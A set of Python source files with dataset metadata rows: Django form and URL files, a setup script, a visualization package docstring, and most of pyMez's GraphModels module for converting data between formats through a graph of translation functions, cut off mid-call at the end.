'<link href="css/osm_field.min.css" type="text/css" media="screen" rel="stylesheet" />',
''.join(css)
)
@override_settings(DEBUG=True)
def test_js_debug(self):
js = DefaultNamingForm().media.render_js()
self.assertEqual(
'<script type="text/javascript" src="js/vendor/leaflet.js"></script>'
'<script type="text/javascript" src="js/osm_field.js"></script>',
''.join(js)
)
def test_js_no_debug(self):
js = DefaultNamingForm().media.render_js()
self.assertEqual(
'<script type="text/javascript" src="js/vendor/leaflet.js"></script>'
'<script type="text/javascript" src="js/osm_field.min.js"></script>',
''.join(js)
)
| 36.965812 | 100 | 0.589364 | [
"MIT"
] | sinnwerkstatt/django-osm-field | tests/test_forms.py | 4,325 | Python |
""" Visualize the single different data samples or averages
All visualization nodes are zero-processing nodes, i.e. their execute method
returns exactly the data that it gets as parameter. However, when the data
is passed through the visualization node, it performs different kinds of
analysis and creates some plots of the data. In principle, visualization nodes
can be plugged between two arbitrary other nodes;
however some nodes expect that the data contains some meta-information like
channel- or feature names.
Many of the nodes are trainable even though don't really learn a model (they
don't process the data anyway). The reason for that is that they require
information about the class labels for creating the plots.
"""
| 49.066667 | 78 | 0.80163 | [
"BSD-3-Clause"
] | pyspace/pyspace | pySPACE/missions/nodes/visualization/__init__.py | 736 | Python |
from distutils.core import setup
setup(name='geoNet',
version='1.0',
packages=['geoNet',
'geoNet.gmpe',
],
)
| 17.777778 | 32 | 0.475 | [
"MIT"
] | ucgmsim/Pre-processing | geoNet/setup.py | 160 | Python |
"""CovidDetector URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include("main.urls"))
]
| 34.73913 | 77 | 0.704631 | [
"Unlicense",
"MIT"
] | anupam-tiwari/Def-Hacks-2020 | CovidDetector/urls.py | 799 | Python |
#-----------------------------------------------------------------------------
# Name: GraphModels
# Purpose: To store graphs used in network translations
# Author: Aric Sanders
# Created: 4/6/2016
# License: MIT License
#-----------------------------------------------------------------------------
"""
Graph Models stores sub classes of graphs that define data translations. All edges
or the functions that define translations from one format to another
are found in <a href="./Translations.m.html">`pyMez.Code.DataHandlers.Translations`</a>.
Currently, the module networkx is used to display the graph.
Examples
--------
#!python
>>from pyMez import *
>>image_graph=ImageGraph()
>>image_graph.set_state('png','my_png.png')
>>image_graph.move_to_node('EmbeddedHtml')
>>output=image_graph.data
>>print output
<h3><a href="../../../Examples/Html/GraphModels_Example.html">GraphModels Example</a></h3>
Requirements
------------
+ [sys](https://docs.python.org/2/library/sys.html)
+ [os](https://docs.python.org/2/library/os.html?highlight=os#module-os)
+ [networkx](http://networkx.github.io/)
+ [numpy](http://www.numpy.org/)
+ [pyMez](https://github.com/aricsanders/pyMez)
Help
---------------
<a href="./index.html">`pyMez.Code.DataHandlers`</a>
<div>
<a href="../../../pyMez_Documentation.html">Documentation Home</a> |
<a href="../../index.html">API Documentation Home</a> |
<a href="../../../Examples/html/Examples_Home.html">Examples Home</a> |
<a href="../../../Reference_Index.html">Index</a>
</div>
"""
#-----------------------------------------------------------------------------
# Standard Imports
import re
import datetime
import sys
import os
#-----------------------------------------------------------------------------
# Third Party Imports
sys.path.append(os.path.join(os.path.dirname( __file__ ), '..','..'))
try:
from Code.Utils.Alias import *
METHOD_ALIASES=1
except:
print("The module pyMez.Code.Utils.Alias was not found")
METHOD_ALIASES=0
pass
try:
from Code.DataHandlers.GeneralModels import *
except:
print("The module pyMez.Code.DataHandlers.GeneralModels was not found,"
"please put it on the python path")
raise ImportError
try:
from Code.DataHandlers.TouchstoneModels import *
except:
print("The module pyMez.Code.DataHandlers.TouchstoneModels was not found,"
"please put it on the python path")
raise ImportError
try:
from Code.DataHandlers.Translations import *
except:
print("The module pyMez.Code.DataHandlers.Translations was not found or had an error,"
"please put it on the python path or resolve the error")
raise ImportError
try:
import numpy as np
except:
print("The module numpy was not found,"
"please put it on the python path")
raise ImportError
try:
import networkx
except:
print("The module networkx was not found,"
"please put it on the python path")
raise ImportError
#-----------------------------------------------------------------------------
# Module Constants
#-----------------------------------------------------------------------------
# Module Functions
# as an example these functions are left.
#todo: Change the names
def edge_1_to_2(in_string):
"A Test function for an edge for a Graph"
return in_string.splitlines()
def edge_2_to_1(string_list):
"""A test function for an edge in a Graph"""
return string_list_collapse(string_list)
def visit_all_nodes(graph):
"""Visit all nodes visits each node on a graph"""
nodes=graph.node_names
for node in nodes:
graph.move_to_node(node)
def visit_and_print_all_nodes(graph):
"""Visits all the nodes in graph and prints graph.data after each move"""
nodes=graph.node_names
for node in nodes:
graph.move_to_node(node)
print((graph.data))
def to_node_name(node_data):
"""Creates a node name given an input object, does a bit of silly type selecting and name rearranging. This matches for 75%
of the cases. There are a lot of user defined nodes without a clear path to generate a name. For instance the DataTableGraph
node HpFile, does not save with a .hp extension so it would be auto named TxtFile if was only selected by the path name.
If it is auto selected it returns StringList because it is of the format ["file_path","schema_path"] """
# we retrieve the text version of the class name
class_name = node_data.__class__.__name__
node_name = class_name
# now for dict and list types we want to inspect the first Element to see what it is
if re.match('list', class_name):
node_name = "List"
try:
element_class_name = node_data[0].__class__.__name__
node_name = element_class_name + node_name
except:
pass
elif re.match('dict', class_name):
node_name = "Dictionary"
try:
element_class_name = list(node_data.values())[0].__class__.__name__
node_name = element_class_name + node_name
except:
pass
elif re.match('str', class_name):
node_name = "String"
# Now we have to check if it is an existing file name
if os.path.isfile(node_data):
node_name = "File"
extension = ""
try:
if re.search("\.", node_data):
extension = node_data.split(".")[-1]
node_name = extension.title() + node_name
except:
pass
elif fnmatch.fnmatch(node_data, "*.*"):
node_name = "File"
try:
if re.search("\.", node_data):
extension = node_data.split(".")[-1]
node_name = extension.title() + node_name
except:
pass
node_name = node_name.replace("str", "String").replace("dict", "Dictionary")
return (node_name)
def TableGraph_to_Links(table_graph, **options):
"""Converts a table graph to a set of download links with embedded data in them"""
defaults = {"base_name": None,
"nodes": ['XmlFile', 'CsvFile', 'ExcelFile', 'OdsFile', 'MatFile', 'HtmlFile', 'JsonFile'],
"extensions": ['xml', 'csv', 'xlsx', 'ods', 'mat', 'html', 'json'],
"mime_types": ['application/xml', 'text/plain',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.spreadsheet',
'application/x-matlab-data', 'text/html', 'application/json']}
conversion_options = {}
for key, value in defaults.items():
conversion_options[key] = value
for key, value in options.items():
conversion_options[key] = value
if conversion_options["base_name"] is None:
base_name = 'test.txt'
else:
base_name = conversion_options["base_name"]
nodes = conversion_options["nodes"]
extensions = conversion_options["extensions"]
mime_types = conversion_options["mime_types"]
out_links = ""
for node_index, node in enumerate(nodes):
table_graph.move_to_node(node)
file_path = table_graph.data
in_file = open(file_path, 'rb')
content_string = in_file.read()
link = String_to_DownloadLink(content_string,
suggested_name=change_extension(base_name, extensions[node_index]),
mime_type=mime_types[node_index],
text=extensions[node_index])
if node_index == len(nodes) - 1:
out_links = out_links + link
else:
out_links = out_links + link + " | "
return out_links
def remove_circular_paths(path):
"""Removes pieces of the path that just end on the same node"""
# Todo: Track the error that leaves out a needed path sometimes
# See http://localhost:8888/notebooks/Two_Port_Matrix_Parameters_Debug_20170105_001.ipynb
edge_pattern=re.compile("edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)")
past_locations=[]
for index,edge in enumerate(path):
match=re.match(edge_pattern,edge)
begin_node=match.groupdict()["begin_node"]
end_node=match.groupdict()["end_node"]
past_locations.append(begin_node)
#print("{0} is {1}".format("past_locations",past_locations))
new_path=[]
node_index=0
between_list=[False for item in past_locations]
while(node_index<len(past_locations)):
node=past_locations[node_index]
old_path=new_path
new_path=[]
# if you visit a location more than one
number_of_visits=past_locations.count(node)
if number_of_visits>1:
#print("{0} is {1}".format("node",node))
#print("{0} is {1}".format("past_locations",past_locations))
# Now find all the visits to that location
equality_list=[x==node for x in past_locations]
print(("{0} is {1}".format("equality_list",equality_list)))
# You are intially not between visits
between=False
# every time you cross that node you flip between, as long as there are
visit_number=0
for index,equality in enumerate(equality_list):
if equality:
# add one to the visit number
visit_number+=1
# Flip the between truth value if it is the first or last
# visits only
if visit_number==1 or visit_number==number_of_visits:
between=not between
between_list[index]=between or between_list[index]
else:
between_list[index]=between or between_list[index]
else:
between_list[index]=between or between_list[index]
#print("{0} is {1}".format("between_list",between_list))
for index,item in enumerate(between_list):
if not item:
new_path.append(path[index])
node_index+=1
if new_path in [[]]:
new_path=path
return new_path
#-----------------------------------------------------------------------------
# Module Classes
# getting around to adding a breadth first graph solver to Graph class
# modify the find_path method
class Graph(object):
"""The Graph class creates a content graph that has as nodes different formats. As
a format is added via graph.add_node() by specifying a node name and a function from an
existing node into the new one, and one exiting the node. Once a series of nodes exists
to enter the graph at a node use graph.set_state() the current data representing the
state is in the attribute graph.data. To move among the formats use graph.move_to_node('NodeName')
need to recode the find_path method using a shortest path alogrithm like
[Dijkstra](https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm).
"""
def __init__(self, **options):
"""Initializes the graph. The first 2 nodes and two edges forming a bijection between them are required"""
defaults = {"graph_name": "Graph",
"node_names": ['n1', 'n2'],
"node_descriptions": ["A plain string",
"A list of strings with no \\n, created with string.splitlines()"],
"current_node": 'n1',
"state": [1, 0],
"data": "This is a test string\n it has to have multiple lines \n and many characters 34%6\n^",
"edge_2_to_1": edge_2_to_1,
"edge_1_to_2": edge_1_to_2
}
self.options = {}
for key, value in defaults.items():
self.options[key] = value
for key, value in options.items():
self.options[key] = value
self.elements = ['graph_name', 'node_names', 'node_descriptions', 'current_node', 'state', 'data']
for element in self.elements:
self.__dict__[element] = self.options[element]
self.edges = []
self.edge_matrices = []
self.state_matrix = np.matrix(self.state).T
# Add the first 2 edges, required to intialize the graph properly
self.display_graph = networkx.DiGraph()
self.add_edge(self.node_names[0], self.node_names[1], self.options["edge_1_to_2"])
self.add_edge(self.node_names[1], self.node_names[0], self.options["edge_2_to_1"])
self.jumps = []
self.external_node_names = []
self.external_node_descriptions = []
self.display_layout = networkx.spring_layout(self.display_graph)
def get_description_dictionary(self):
"returns a dictionary of the form {NodeName:Node Description for all of the current nodes"
dictionary = {node_name: self.node_descriptions[index] for index, node_name in enumerate(self.node_names)}
return dictionary
def set_state(self, node_name, node_data):
"""Sets the graph state to be the state specified by node_name, and node_data"""
try:
current_node_state_position = self.node_names.index(node_name)
self.current_node = node_name
self.data = node_data
self.state = [0 for i in range(len(self.node_names))]
self.state[current_node_state_position] = 1
self.state_matrix = np.matrix(self.state).T
except:
print(("Could not set the state of graph: {0}".format(self.graph_name)))
raise
def add_edge(self, begin_node=None, end_node=None, edge_function=None):
"""Adds an edge mapping one node to another, required input is begin_node (it's name)
end_node, and the edge function"""
# check to see if edge is defined if it is increment a number
edge_match = re.compile("edge_{0}_{1}".format(begin_node, end_node))
keys = list(self.__dict__.keys())
# print keys
iterator = 0
for key in keys:
if re.match(edge_match, key):
iterator += 1
edge_name = "edge_{0}_{1}_{2:0>3d}".format(begin_node, end_node, iterator)
self.__dict__[edge_name] = edge_function
self.edges.append(edge_name)
edge_matrix = np.zeros((len(self.state), len(self.state)))
begin_position = self.node_names.index(begin_node)
end_position = self.node_names.index(end_node)
edge_matrix[end_position][begin_position] = 1
edge_matrix = np.matrix(edge_matrix)
self.edge_matrices.append(edge_matrix)
self.display_graph.add_edge(begin_node, end_node)
self.display_layout = networkx.spring_layout(self.display_graph)
def add_jump(self, begin_node=None, end_node=None, jump_function=None):
"""Adds a jump mapping one internal node to an external node, required input is begin_node (it's name)
end_node, and the edge function"""
# check to see if edge is defined if it is increment a number
jump_match = re.compile("jump_{0}_{1}".format(begin_node, end_node))
keys = list(self.__dict__.keys())
# print keys
iterator = 0
for key in keys:
if re.match(jump_match, key):
iterator += 1
jump_name = "jump_{0}_{1}_{2:0>3d}".format(begin_node, end_node, iterator)
self.__dict__[jump_name] = jump_function
self.jumps.append(jump_name)
self.display_graph.add_edge(begin_node, end_node)
self.display_layout = networkx.spring_layout(self.display_graph)
def move_to(self, path, **options):
"""Changes the state of the graph by moving along the path specified"""
defaults = {"debug": False, "verbose": False}
move_options = {}
for key, value in defaults.items():
move_options[key] = value
for key, value in options.items():
move_options[key] = value
if move_options["debug"]:
print(path)
for index, edge in enumerate(path):
# print edge
edge_pattern = 'edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)'
match = re.match(edge_pattern, edge)
begin_node = match.groupdict()['begin_node']
end_node = match.groupdict()['end_node']
if move_options["verbose"]:
print(("moving {0} -> {1}".format(begin_node, end_node)))
# print self.data
self.data = self.__dict__[edge](self.data)
# print self.data
self.current_node = match.groupdict()['end_node']
self.state = [0 for i in range(len(self.node_names))]
position = self.node_names.index(self.current_node)
self.state[position] = 1
self.state_matrix = np.matrix(self.state).T
# print self.state
# print self.current_node
def virtual_move_to(self, path):
"""virtual_move_to simulates moving but does not change the state of the graph"""
# print path
temp_state = self.state
temp_data = self.data
temp_current_node = self.current_node
temp_node_names = self.node_names
for index, edge in enumerate(path):
# print edge
edge_pattern = 'edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)'
match = re.match(edge_pattern, edge)
begin_node = match.groupdict()['begin_node']
end_node = match.groupdict()['end_node']
# print("moving {0} -> {1}".format(begin_node,end_node))
# print self.data
temp_data = self.__dict__[edge](temp_data)
# print self.data
temp_current_node = match.groupdict()['end_node']
temp_state = [0 for i in range(len(temp_node_names))]
position = temp_node_names.index(temp_current_node)
temp_state[position] = 1
# print temp_state
# print self.state
# print self.current_node
def __str__(self):
return str(self.data)
def add_node(self, node_name, edge_into_node_begin, edge_into_node_function, edge_out_node_end,
edge_out_node_function, node_description=None):
"""Adds a node to the graph. Required input is node_name (a string with no spaces),
a reference to an entering node,the function mapping the entering node to the new node,
a reference to an exiting node and the function mapping the
new node to the exiting node."""
# first check if node into and out of node is good
self.node_names.append(node_name)
self.state.append(0)
self.state_matrix = np.matrix(self.state).T
for index, matrix in enumerate(self.edge_matrices):
pad_row = np.zeros((1, len(matrix)))
new_matrix = np.concatenate((matrix, pad_row), axis=0)
pad_column = np.zeros((1, len(self.node_names)))
new_matrix = np.concatenate((new_matrix, pad_column.T), axis=1)
# print("New matrix is :\n{0}".format(new_matrix))
self.edge_matrices[index] = new_matrix
self.add_edge(begin_node=node_name, end_node=edge_out_node_end, edge_function=edge_out_node_function)
self.add_edge(begin_node=edge_into_node_begin, end_node=node_name, edge_function=edge_into_node_function)
if node_description:
self.node_descriptions.append(node_description)
self.display_graph.add_node(node_name)
self.display_graph.add_edge(node_name, edge_out_node_end)
self.display_graph.add_edge(edge_into_node_begin, node_name)
self.display_layout = networkx.spring_layout(self.display_graph)
def add_external_node(self, external_node_name, jump_into_node_begin,
jump_into_node_function, external_node_description=None):
"""Adds an external node to the graph. Required input is node_name (a string with no spaces),
a reference to an entering node,the function mapping the entering node to the new external node"""
# first check if node into and out of node is good
self.external_node_names.append(external_node_name)
self.add_jump(begin_node=jump_into_node_begin, end_node=external_node_name,
jump_function=jump_into_node_function)
if external_node_description:
self.external_node_descriptions.append(external_node_description)
self.display_graph.add_node(external_node_name)
self.display_graph.add_edge(jump_into_node_begin, external_node_name)
self.display_layout = networkx.spring_layout(self.display_graph)
def jump_to_external_node(self, external_node_name, **options):
"""Returns the result of the jump, the graph is left in the node that is the begining of the jump"""
end_node = external_node_name
jump_pattern = 'jump_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(end_node)
for jump in self.jumps[:]:
jump_match = re.match(jump_pattern, jump, re.IGNORECASE)
if jump_match:
jump_to_use = jump
begin_node = jump_match.groupdict()["begin_node"]
self.move_to_node(begin_node)
return self.__dict__[jump_to_use](self.data, **options)
def path_length(self, path, num_repeats=10):
"""Determines the length of a given path, currently the metric is based on the time to move to."""
begin_time = datetime.datetime.now()
# num_repeats=100
for i in range(num_repeats):
self.virtual_move_to(path)
end_time = datetime.datetime.now()
delta_t = end_time - begin_time
path_length = delta_t.total_seconds() / float(num_repeats)
if path_length == 0.0:
print("Warning the path length is less than 1 microsecond,"
"make sure num_repeats is high enough to measure it.")
return path_length
def is_path_valid(self, path):
"""Returns True if the path is valid from the current node position or False otherwise"""
null_state = [0 for i in range(len(self.node_names))]
null_state_matrix = np.matrix(null_state).T
new_state = np.matrix(self.state).T
for index, edge in enumerate(path):
# print index
# print edge
edge_position = self.edges.index(edge)
move_matrix = self.edge_matrices[edge_position]
# print move_matrix
new_state = move_matrix * new_state
if new_state.any() == null_state_matrix.any():
# print new_state
# print null_state_matrix
return False
return True
def get_entering_nodes(self, node):
"""Returns all nodes that have an edge that enter the specificed node"""
enter_edge_pattern = re.compile('edge_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(node))
enter_nodes = []
for index, edge in enumerate(self.edges):
enter_match = re.match(enter_edge_pattern, edge)
if enter_match:
enter_node = enter_match.groupdict()['begin_node']
enter_nodes.append(enter_node)
return enter_nodes
def get_entering_edges(self, node):
"""Returns all edges that enter the specificed node"""
enter_edge_pattern = re.compile('edge_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(node))
enter_edges = []
for index, edge in enumerate(self.edges):
if re.match(enter_edge_pattern, edge):
enter_edges.append(edge)
return enter_edges
def get_exiting_edges(self, node):
"""Returns all edges that exit the specificed node"""
exit_edge_pattern = re.compile('edge_{0}_(?P<end_node>\w+)_(?P<iterator>\w+)'.format(node))
exit_edges = []
for index, edge in enumerate(self.edges):
if re.match(exit_edge_pattern, edge):
exit_edges.append(edge)
return exit_edges
def get_exiting_nodes(self, node):
"""Returns all nodes that have an edge leaving the specificed node"""
exit_edge_pattern = re.compile('edge_{0}_(?P<end_node>\w+)_(?P<iterator>\w+)'.format(node))
exit_nodes = []
for index, edge in enumerate(self.edges):
exit_match = re.match(exit_edge_pattern, edge)
if exit_match:
exit_node = exit_match.groupdict()['end_node']
exit_nodes.append(exit_node)
return exit_nodes
def get_path(self, first_node, last_node, **options):
"""Returns the first path found between first node and last node, uses a breadth first search algorithm"""
defaults = {"debug": False, "method": "BreathFirst"}
self.get_path_options = {}
for key, value in defaults.items():
self.get_path_options[key] = value
for key, value in options.items():
self.get_path_options[key] = value
unvisited_nodes = self.node_names[:]
unvisited_nodes.remove(first_node)
visited_nodes = [first_node]
node_history = []
edge_history = []
path_queue = []
possible_paths = []
queue = []
current_edge = []
queue.append(first_node)
path = {first_node: []}
while queue:
# first remove the
current_node = queue.pop(0)
if path_queue != []:
current_edge = path_queue.pop(0)
edge_history.append(current_edge)
node_history.append(current_node)
if self.get_path_options["debug"]:
print(("current_node is {0}".format(current_node)))
print(("current_edge is {0}".format(current_edge)))
# if this node is the destination exit returning the path
if current_node == last_node:
if self.get_path_options["debug"]:
print(("Node path was found to be {0}".format(node_path)))
print(("path was found to be {0}".format(edge_path)))
print(("{0} is {1}".format("path", path)))
return path[last_node][::-1]
adjacent_nodes = self.get_exiting_nodes(current_node)
adjacent_paths = self.get_exiting_edges(current_node)
if self.get_path_options["debug"]:
print(("{0} are {1}".format("adjacent_nodes", adjacent_nodes)))
print(("{0} are {1}".format("adjacent_paths", adjacent_paths)))
current_history = edge_history
for node_index, node in enumerate(adjacent_nodes):
if node not in visited_nodes:
queue.append(node)
path_queue.append(adjacent_paths[node_index])
visited_nodes.append(node)
path[node] = [adjacent_paths[node_index]] + path[current_node]
path[node]
# possible_paths.append(current_path.append(node))
if self.get_path_options["debug"]:
print(("{0} is {1}".format("path_queue", path_queue)))
def move_to_node(self, node):
"""Moves from current_node to the specified node"""
path = self.get_path(self.current_node, node)
self.move_to(path)
def check_closed_path(self):
"""Checks that data is not changed for the first closed path found. Returns True if data==data after
moving around the closed path, False otherwise. Starting point is current_node """
temp_data = self.data
path = self.get_path(self.current_node, self.current_node)
if self.is_path_valid(path):
pass
else:
print("Path is not valid, graph definition is broken")
raise
out = temp_data == self.data
out_list = [self.current_node, path, out]
print(("The assertion that the data remains unchanged,\n"
"for node {0} following path {1} is {2}".format(*out_list)))
return out
def is_graph_isomorphic(self):
"""Returns True if all nodes have closed paths that preserve the data, False otherwise"""
out = True
for node in self.node_names:
self.move_to_node(node)
if not self.check_closed_path:
out = False
return out
def show(self, **options):
"""Shows the graph using matplotlib and networkx"""
# Should be seperated to allow for fixed presentation?
defaults = {"descriptions": False, "edge_descriptions": False, "save_plot": False,
"path": None, "active_node": True, "directory": None,
"specific_descriptor": self.graph_name.replace(" ", "_"),
"general_descriptor": "plot", "file_name": None,
"arrows": True, "node_size": 1000, "font_size": 10, "fix_layout": True}
show_options = {}
for key, value in defaults.items():
show_options[key] = value
for key, value in options.items():
show_options[key] = value
if show_options["directory"] is None:
show_options["directory"] = os.getcwd()
if show_options["active_node"]:
node_colors = []
for node in self.display_graph.nodes():
if node == self.current_node:
node_colors.append('b')
else:
if node in self.node_names:
node_colors.append('r')
elif node in self.external_node_names:
node_colors.append('g')
else:
node_colors = ['r' for node in self.node_names] + ['g' for node in self.node_names]
# print("{0} is {1}".format('node_colors',node_colors))
if show_options["descriptions"]:
node_labels = {node: self.node_descriptions[index] for index,
node in enumerate(self.node_names)}
if self.external_node_names:
for index, node in enumerate(self.external_node_names):
node_labels[node] = self.external_node_descriptions[index]
networkx.draw_networkx(self.display_graph, arrows=show_options["arrows"],
labels=node_labels, node_color=node_colors,
node_size=show_options["node_size"], font_size=show_options["font_size"],
pos=self.display_layout)
# print("{0} is {1}".format('node_labels',node_labels))
else:
networkx.draw_networkx(self.display_graph, arrows=show_options["arrows"], node_color=node_colors,
node_size=show_options["node_size"], font_size=show_options["font_size"],
pos=self.display_layout)
plt.axis('off')
plt.suptitle(self.options["graph_name"])
if show_options["file_name"] is None:
file_name = auto_name(specific_descriptor=show_options["specific_descriptor"],
general_descriptor=show_options["general_descriptor"],
directory=show_options["directory"], extension='png', padding=3)
else:
file_name = show_options["file_name"]
if show_options["save_plot"]:
# print file_name
if show_options["path"]:
plt.savefig(show_options["path"])
else:
plt.savefig(os.path.join(show_options["directory"], file_name))
else:
plt.show()
fig = plt.gcf()
return fig
class StringGraph(Graph):
"""String Graph is a graph relating different string forms"""
def __init__(self,**options):
"""Intializes the StringGraph Class by defining nodes and edges"""
defaults={"graph_name":"StringGraph",
"node_names":['String','StringList'],
"node_descriptions":["A plain string",
"A list of strings with no \\n, created with string.splitlines()"],
"current_node":'String',
"state":[1,0],
"data":"This is a test string\n it has to have multiple lines \n and many characters 34%6\n^",
"edge_2_to_1":edge_2_to_1,
"edge_1_to_2":edge_1_to_2
}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("File","String",String_to_File,"String",File_to_String,node_description="Plain File")
self.add_node("CStringIo","String",String_to_CStringIo,"String",CStringIo_to_String,node_description="C File Like Object")
self.add_node("StringIo","String",String_to_StringIo,"String",StringIo_to_String,node_description="File Like Object")
self.add_edge(begin_node="StringList",end_node="File",edge_function=StringList_to_File)
# Changed from ColumnModeledGraph to TableGraph 12/14/2016 by AWS
class TableGraph(Graph):
"""Class that transforms column modeled data (table) from one format to another, use set_state to initialize to
your data.
#!python
defaults={"graph_name":"Table Graph",
"node_names":['DataFrame','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame","AsciiDataTable"],
"current_node":'DataFrame',
"state":[1,0],
"data":pandas.DataFrame([[1,2,3],[3,4,5]],columns=["a","b","c"]),
"edge_2_to_1":AsciiDataTable_to_DataFrame,
"edge_1_to_2":DataFrame_to_AsciiDataTable}
"""
def __init__(self,**options):
defaults={"graph_name":"Table Graph",
"node_names":['DataFrame','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame","AsciiDataTable"],
"current_node":'DataFrame',
"state":[1,0],
"data":pandas.DataFrame([[1,2,3],[3,4,5]],columns=["a","b","c"]),
"edge_2_to_1":AsciiDataTable_to_DataFrame,
"edge_1_to_2":DataFrame_to_AsciiDataTable}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("HdfFile","DataFrame",DataFrame_to_HdfFile,
"DataFrame",HdfFile_to_DataFrame,
node_description="HDF File")
self.add_node("XmlDataTable","AsciiDataTable",AsciiDataTable_to_XmlDataTable,
"AsciiDataTable",XmlDataTable_to_AsciiDataTable,
node_description="XML Data Table")
# Need to add XML File and Html File using save and save_HTML()
self.add_node("ExcelFile","DataFrame",DataFrame_to_ExcelFile,
"DataFrame",ExcelFile_to_DataFrame,
node_description="Excel File")
self.add_node("OdsFile","ExcelFile",ExcelFile_to_OdsFile,
"ExcelFile",OdsFile_to_ExcelFile,"Open Office Spreadsheet")
self.add_node("HtmlString","DataFrame",DataFrame_to_HtmlString,
"DataFrame",HtmlString_to_DataFrame,
node_description="HTML String")
# Note a lot of the pandas reading and writing cause float64 round off errors
# applymap(lambda x: np.around(x,10) any all float fields will fix this
# also the column names move about in order
self.add_node("JsonFile","DataFrame",DataFrame_to_JsonFile,
"DataFrame",JsonFile_to_DataFrame,
node_description="JSON File")
self.add_node("JsonString","DataFrame",DataFrame_to_JsonString,
"DataFrame",JsonString_to_DataFrame,
node_description="JSON String")
self.add_node("CsvFile","DataFrame",DataFrame_to_CsvFile,
"DataFrame",CsvFile_to_DataFrame,
node_description="CSV File")
self.add_node("MatFile","AsciiDataTable",AsciiTable_to_MatFile,
"AsciiDataTable",MatFile_to_AsciiTable,
node_description="Matlab File")
self.add_node("XmlFile","XmlDataTable",XmlDataTable_to_XmlFile,
"XmlDataTable",XmlFile_to_XmlDataTable,
node_description="XML DataTable Saved As a File")
self.add_node("HtmlFile","HtmlString",HtmlString_to_HtmlFile,
"HtmlString",HtmlFile_to_HtmlString,
node_description="HTML File")
self.add_edge("DataFrame","HtmlFile",DataFrame_to_HtmlFile)
self.add_edge("JsonFile","XmlDataTable",JsonFile_to_XmlDataTable)
self.add_external_node("XsltResultString","XmlDataTable",XmlBase_to_XsltResultString,
external_node_description="XSLT Results String")
self.add_external_node("XsltResultFile","XmlDataTable",XmlBase_to_XsltResultFile,
external_node_description="XSLT Results File")
class ImageGraph(Graph):
"""A transformation graph for images node types are image formats and external nodes are
common image processing functions
#!python
defaults={"graph_name":"Image Graph",
"node_names":['Image','png'],
"node_descriptions":["PIL Image","png"],
"current_node":'Image',
"state":[1,0],
"data":PIL.Image.open(os.path.join(TESTS_DIRECTORY,'test.png')),
"edge_2_to_1":File_to_Image,
"edge_1_to_2":lambda x: Image_to_FileType(x,file_path="test",extension="png")}
"""
def __init__(self,**options):
defaults={"graph_name":"Image Graph",
"node_names":['Image','Png'],
"node_descriptions":["PIL Image","Png"],
"current_node":'Image',
"state":[1,0],
"data":PIL.Image.open(os.path.join(TESTS_DIRECTORY,'test.png')),
"edge_2_to_1":File_to_Image,
"edge_1_to_2":lambda x: Image_to_FileType(x,file_path="test",extension="png")}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("Jpg","Image",lambda x: Image_to_FileType(x,file_path="test",extension="jpg"),
"Image",File_to_Image,node_description="Jpg File")
self.add_node("Tiff","Image",lambda x: Image_to_FileType(x,file_path="test",extension="tiff"),
"Image",File_to_Image,node_description="Tif File")
self.add_node("Gif","Image",lambda x: Image_to_FileType(x,file_path="test",extension="gif"),
"Image",File_to_Image,node_description="Gif File")
self.add_node("Bmp","Image",lambda x: Image_to_FileType(x,file_path="test",extension="bmp"),
"Image",File_to_Image,node_description="BMP File")
self.add_node("Base64","Png",PngFile_to_Base64,
"Png",Base64_to_PngFile,node_description="Base 64 PNG")
self.add_node("EmbeddedHtml","Base64",Base64Png_to_EmbeddedHtmlString,
"Base64",EmbeddedHtmlString_to_Base64Png,node_description="Embedded HTML of PNG")
self.add_node("Ndarray","Png",PngFile_to_Ndarray,
"Png",Ndarray_to_PngFile,node_description="Numpy Array")
self.add_node("MatplotlibFigure","Ndarray",Ndarray_to_MatplotlibFigure,
"Png",MatplotlibFigure_to_PngFile,node_description="MatplotlibFigure")
self.add_external_node("Thumbnail","Image",Image_to_ThumbnailFile,external_node_description="JPEG Thumbnail")
self.add_external_node("Matplotlib","Ndarray",Ndarray_to_Matplotlib,
external_node_description="Matplotlib Plot")
class MetadataGraph(Graph):
"""Metadata Graph is a graph representing the content of key,value metadata"""
def __init__(self,**options):
"""Intializes the metadata graph class"""
defaults={"graph_name":"Metadata Graph",
"node_names":['Dictionary','JsonString'],
"node_descriptions":["Python Dictionary","Json string"],
"current_node":'Dictionary',
"state":[1,0],
"data":{"a":"First","b":"Second"},
"edge_2_to_1":JsonString_to_Dictionary,
"edge_1_to_2":Dictionary_to_JsonString}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("JsonFile","JsonString",JsonString_to_JsonFile,
"JsonString",JsonFile_to_JsonString,node_description="JSON File")
self.add_node("XmlString","Dictionary",Dictionary_to_XmlString,
"Dictionary",XmlString_to_Dictionary,node_description="XML string")
self.add_node("HtmlMetaString","Dictionary",Dictionary_to_HtmlMetaString,
"Dictionary",HtmlMetaString_to_Dictionary,node_description="HTML meta tags")
self.add_node("XmlTupleString","Dictionary",Dictionary_to_XmlTupleString,
